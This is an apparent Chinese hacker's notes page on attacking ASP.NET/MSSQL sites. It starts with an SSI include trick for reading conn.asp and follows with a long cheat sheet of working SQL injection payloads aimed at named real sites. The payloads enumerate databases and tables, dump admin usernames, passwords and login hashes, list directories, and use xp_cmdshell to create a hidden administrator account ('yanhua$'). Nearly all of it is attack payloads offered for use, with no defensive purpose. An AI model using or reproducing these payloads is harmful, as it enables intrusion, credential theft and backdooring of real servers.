当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时
2010-04-27 00:46:05 作者：asphack 来源： 浏览次数：6 

方法:上传一个shtm文件, 内容为:

<!--#include file="conn.asp"-->


直接请求这个shtm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 

解析:

<!--#include file="conn.asp"-->
就是一条SSI指令，其作用是将"conn.asp"的内容拷贝到当前的页面中，当访问者来浏览时，会看到其

它HTML文档一样显示conn.asp其中的内容。 

前提:服务器的对shtm或者shtml的扩展没有删除！ 

至于conn.asp可以为其他,比如config.inc.php config.aspx 等一些数据配置文件 









http://stuic.fzu.edu.cn/NewsMore.aspx?bid=61

F:\工作\星讯\xsc3\xsc\NewsMore.aspx.cs:66
判断： 
http://stuic.fzu.edu.cn/NewsMore.aspx?bid=61%20and%201=1 正常

http://stuic.fzu.edu.cn/NewsMore.aspx?bid=61%20and%201=2 出错

判断数据库类型：

NewsMore.aspx?bid=61 and (select count(*) from sysobjects)>0 正常 mssql

and (select count(*) from msysobjects)>0 正常 access

mssql数据：

判断用户权限: and user>0                                将 nvarchar 值 'homePage' 转换为数据类型为 int 的列时发生语法错误
pangolin:     http://www.0597syw.com/LyPhoto/Ly_WordShowSch.aspx?nid=935'%20and%20user=0-- 字符型注入  将 nvarchar 值 'dbo' 转换成数据类型 int 时失败
              nid=935'%20and%20@@servername%3E0--  %3e=">"  将 nvarchar 值 'SERVER1' 转换
主机名：      .......'%20and%20host_name()=0--

数据库用户：    '%20and%20system_user%3E0--

判断权限：
And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
PS:0×730079007300610064006D0069006E00 = sysadmin

pangolin: '%20and%20cast(is_srvrolemember(0x730079007300610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%20'1'='1


%20%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1 db_owner
0表示不是某某成员，1表示是。0不是
判断有几个数据库：
            %20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20master..sysdatabases)%3E0


爆库名：    and db_name()>0                             nvarchar 值 'onlineclass' 转换为数据类型为 int 的列时发生语法错误 
            and 1=(select name from master.dbo.sysdatabases where dbid=6)-- 依次改7,8,9,10,11 (1-5是系统默认数据库)
pangolin:   '%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0-- 
                                                                                                                                                                      top 2 爆第二个库名                                                                                    
            '%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%202%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
            '%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%203%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0-- 第三个库名
            
系统盘：    
      ';drop%20table%20pangolin_test_table;-- 先删表
      '%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));-- 建个表
      '%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--  定义一个盘 low和hing两部组成

判断有几个盘，并输入:'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)-- 

系统管理员：
  （1） '%20;drop%20table%20pangolin_test_table;--   册处原来的临时表
   （2）   '%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));-- 建临时表
     （3）'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
      
'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)-- 
（                   ******必需先完成上面三步才可能执行这步）*****

读数据库系统用户名和密码：

'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bisnull(master.dbo.fn_varbintohexstr([password_hash]),char(32))%20from(select%20top%20%201%20[name],[password_hash]%20from%20[master].[sys].[sql_logins]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--
'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bisnull(master.dbo.fn_varbintohexstr([password_hash]),char(32))%20from(select%20top%20%202%20[name],[password_hash]%20from%20[master].[sys].[sql_logins]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)-- 
                                                                                                                                                                          第二个用户      

判断版本:   NewsMore.aspx?bid=(select @@VERSION)--              
                                                    nvarchar 值 'Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
或:NewsMore.aspx?bid=61 and 1=(select @@VERSION)--  May  3 2005 23:18:38 
                                                    Copyright (c) 1988-2003 Microsoft Corporation
                                                    Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
当前连接用户：
=(select%20user_name())--                           nvarchar 值 'homePage' 转换为数据类型为 int 的列时发生语法错误

判断有多少个表：
         '%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[allphoto].[sys].[all_objects]%20where%20type=char(85))%3E0-- 
爆表：

?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))--
将 nvarchar 值 'bbstu' 转换为数据类型为 int 的列时发生语法错误 得到第一个表 bbstu
pangolin: '%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%201%20object_id,name%20from%20[allphoto].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0-- 第一个表：
          '%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%202%20object_id,name%20from%20[allphoto].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0--  
                                                                                             第二个表                                       
爆第二个：

?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bbstu'))-- 
'nowritestu'


第三个：
=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bbstu','nowritestu'))-- 
'old2007'
第四个
=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bbstu','nowritestu','old2007'))-- 
    'studentInformation'  .........

另类爆表方法：

?id=61 having 1=1

't_oArticleSortA.name' 在选择列表中无效，因为该列未包含在聚合函数中，并且没有 GROUP BY 子句。]
得到表名:oArticleSortA 列名：name

用group by 爆另外的列名：
group by t_oArticleSortA.name having 1=1--      't_oArticleSortA.ID' 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含
第三个列：
group by t_oArticleSortA.name,t_oArticleSortA.ID having 1=1-- 
或：
知道一个列名情况：
select * from t_oArticleSortA group by  name     可以爆出多个列
                                             列 't_oArticleSortA.ID' 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。
                                             列 't_oArticleSortA.sort' 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。
                                             列 't_oArticleSortA.showIndex' 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。 

不知道列的清况下用：
having 1=1  
或：and+1=%28select%20*%20from%20t_oArticleSortA%20having%201=1%29

爆列名pangolin:
    读object_id=274100017   '%20and%20(select%20top%201%20cast([id]%20as%20nvarchar(20))%2bchar(94)%20%20from%20[allphoto].[sys].[sysobjects]%20where%20name=0x410064006d0069006e007300)%3E0-- 
判断有几个列：  '%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[allphoto].[sys].[all_columns]%20where%20object_id=274100017)%3E0--

第一个列名：  '%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%201%20column_id,name%20from%20[allphoto].[sys].[all_columns]%20where%20object_id=274100017%20order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--
第二个列名：  '%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%202%20column_id,name%20from%20[allphoto].[sys].[all_columns]%20where%20object_id=274100017%20order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--
                                                                                                    第二个列名                   库名

判断用户记录数:
and 10<(select count(name) from t_oArticleSortA.name)--
http://stuic.fzu.edu.cn/NewsMore.aspx?bid=61%20and%2010=(select%20count(name)%20from%20t_oArticleSortA)--
pangolin: '%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[allphoto]..[admins]%20where%201=1)%3E0-- 

爆字段内容：
       '%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20allphoto..admins%20where%201=1%20and%20username%20not%20in%20(select%20top%200%20username%20from%20allphoto..admins%20where%201=1%20group%20by%20username))%3E0%20and%20'1'='1                                                                                  库名        表名
                                                  段名                                                                 段名                                                 库名      表名                        段名                                      段名               库名     表名                                段名                           
       '%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20allphoto..admins%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20allphoto..admins%20where%201=1%20group%20by%20username))%3E0%20and%20'1'='1 
   





xp_cmdshell:
 net user:
       (1)建表: '%20;create%20table%20[pangolin_test_table]([resulttxt]%20nvarchar(4000)%20null);--

 利用存贮过和程直接读出操作系统用户 : 

       (2)      '%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x6e006500740020007500730065007200%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)--
                                                              0x6E006500740020007500730065007200 =net user
        (3)判断几个用户      '%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[allphoto]..[pangolin_test_table])%3E0--  
                                                                                                                                                                                                                                04前面加了三个换行符，所以是04 也可以不加那就是01 第一行                                                                                
     (4)爆出系统用户:    '%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20char(124)%20else%20resulttxt%2bchar(124)%20end%20%20from%20[pangolin_test_table]%20where%20id%20not%20in%20(select%20top%204%20id%20from%20[pangolin_test_table]%20order%20by%20[id])%20)%3E0-- 
                         '%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20char(124)%20else%20resulttxt%2bchar(124)%20end%20%20from%20[pangolin_test_table]%20where%20id%20not%20in%20(select%20top%205%20id%20from%20[pangolin_test_table]%20order%20by%20[id])%20)%3E0-- 

                         '%20and%20(select%20top%201%20case%20when%20resulttxt%20is%20null%20then%20char(124)%20else%20resulttxt%2bchar(124)%20end%20%20from%20[pangolin_test_table]%20where%20id%20not%20in%20(select%20top%207%20id%20from%20[pangolin_test_table]%20order%20by%20[id])%20)%3E0-- 
方法二：                                  命令运行完毕，但发生一个或多个错误
删表：            %20;drop%20table%20pangolin_test_table;--     
建表：            %20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));-- 
插入存贮到表中：  %20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
查询表            %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--  


net user yanhua$ yanhua /add 
 1、建表'%20;create%20table%20[pangolin_test_table]([resulttxt]%20nvarchar(4000)%20null);--

 2、加命令：'%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x6E0065007400200075007300650072002000790061006E006800750061002400%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)--
                定义变量 "z"                       赋值给变量z=net user yanhua$ yanhua /add                                    插入命令master.dbo.xp_cmdshell%20@z到表中
net localgroup administrators yanhua$ /add
      1、建表  '%20;create%20table%20[pangolin_test_table]([resulttxt]%20nvarchar(4000)%20null);--  
       2、加命令：'%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x6E006500740020006C006F00630061006C00670072006F00750070002000410064006D0069006E006900730074007200610074006F00720073002000790061006E00680075006100240020002F00610064006400%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)--                                                                                                                                                                                                                                            第二条记录  记录是从0开始记的                                                                                                                                                                                                                       

************第次用命令之前都要先删了临时表，再重建或别外建个表，再加命令，最后删除建的临时表****************
        
                             |只有sa权限才可以| 

************加命令只须把0x0x6E0065007400200075007300650072002000790061006E006800750061002400这段sql_En码换成想要执行命的sql_en码就行****************
=(select name from t_oArticleSortA)--

列目录：DB权限
  判断是否存在以“C：盘”  ';DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"c:\",%201,1--
  
  判断有多个个目录和文件： '%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20and%20''=' 

 第一个目录或文件：'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='
 第二个            '%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='
                                                                                                                                                   第二个                                                                       

子目录：
判断子目录是否存在：';DROP%20TABLE%20D99_Tmp;CREATE%20TABLE%20D99_Tmp(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20D99_Tmp%20exec%20master..xp_dirtree%20"c:\Documents%20and%20Settings\",%201,1--

判断有多个个目录和文件 '%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20D99_Tmp)=0%20%20and%20''=' 

第一个:               '%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''=' 
                      '%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20D99_Tmp%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''=' 
                                                                                                                                                      第二个目录                                                                     

pangolin:
     建表：'%20;drop%20table%20pangolin_test_table;create%20table%20pangolin_test_table([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);-- 
     把盘目录读入表中：'%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x64003a005c00%20insert%20pangolin_test_table%20execute%20master..xp_dirtree%20@z,1,1--
                                                                     0x64003a005c00=d:\
     判断几个目录：    '%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20pangolin_test_table)=0----
     第一个目录：      '%20and%200=(select%20top%201%20cast([isfile]%20as%20nvarchar(4000))%2bchar(94)%2bcast([name]%20as%20nvarchar(4000))%20from%20(select%20distinct%20top%20%201%20[name],[isfile]%20from%20pangolin_test_table%20group%20by%20[name],[isfile]%20order%20by%20[isfile])%20t%20order%20by%20[isfile]%20desc,[name]%20desc)--
     第二个:           '%20and%200=(select%20top%201%20cast([isfile]%20as%20nvarchar(4000))%2bchar(94)%2bcast([name]%20as%20nvarchar(4000))%20from%20(select%20distinct%20top%20%202%20[name],[isfile]%20from%20pangolin_test_table%20group%20by%20[name],[isfile]%20order%20by%20[isfile])%20t%20order%20by%20[isfile]%20desc,[name]%20desc)----
                                                                                                                                                                                   第二个
 
子目录：
       建表：'%20;drop%20table%20pangolin_test_table;create%20table%20pangolin_test_table([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--
                                                                   0x64003a.....目录的sql_en 
       把目录读入表：'%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x64003a005c0043006800750061006e006700780069006e00%20insert%20pangolin_test_table%20execute%20master..xp_dirtree%20@z,1,1-- 

       判断几个目录：'%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20pangolin_test_table)=0---
      
       第一个：      '%20and%200=(select%20top%201%20cast([isfile]%20as%20nvarchar(4000))%2bchar(94)%2bcast([name]%20as%20nvarchar(4000))%20from%20(select%20distinct%20top%20%201%20[name],[isfile]%20from%20pangolin_test_table%20group%20by%20[name],[isfile]%20order%20by%20[isfile])%20t%20order%20by%20[isfile]%20desc,[name]%20desc)---  
                    
        第二个：     '%20and%200=(select%20top%201%20cast([isfile]%20as%20nvarchar(4000))%2bchar(94)%2bcast([name]%20as%20nvarchar(4000))%20from%20(select%20distinct%20top%20%202%20[name],[isfile]%20from%20pangolin_test_table%20group%20by%20[name],[isfile]%20order%20by%20[isfile])%20t%20order%20by%20[isfile]%20desc,[name]%20desc)--







and (Select Top 1 col_name(object_id(‘t_oArticleSortA’),1) from sysobjects)>0










































































































































































































































































































































































































































































































































